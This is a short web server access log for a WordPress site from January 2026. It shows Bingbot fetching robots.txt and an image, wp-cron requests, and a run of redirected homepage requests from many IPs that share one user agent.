52.167.144.65 - - [05/Jan/2026:07:55:15 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.52 - - [05/Jan/2026:07:55:18 +0800] "GET /wp-content/uploads/2025/11/1762908477-QZ_Photo-2.webp HTTP/1.1" 200 185928 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
110.246.151.107 - - [05/Jan/2026:07:58:19 +0800] "GET / HTTP/1.1" 200 34699 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67"
36.133.115.36 - - [05/Jan/2026:07:58:30 +0800] "POST /wp-cron.php?doing_wp_cron=1767571110.6335279941558837890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
27.158.125.55 - - [05/Jan/2026:07:58:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
223.101.105.85 - - [05/Jan/2026:07:58:32 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
111.27.2.48 - - [05/Jan/2026:07:58:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
140.250.149.180 - - [05/Jan/2026:07:58:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
121.233.159.246 - - [05/Jan/2026:07:58:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
121.233.159.246 - - [05/Jan/2026:07:58:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
123.169.212.130 - - [05/Jan/2026:07:58:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
139.210.226.31 - - [05/Jan/2026:07:58:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
36.143.135.125 - - [05/Jan/2026:07:58:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
36.133.115.36 - - [05/Jan/2026:07:58:47 +0800] "POST /wp-cron.php?doing_wp_cron=1767571126.9880609512329101562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
120.235.254.175 - - [05/Jan/2026:07:58:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
36.143.150.121 - - [05/Jan/2026:07:58:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16"
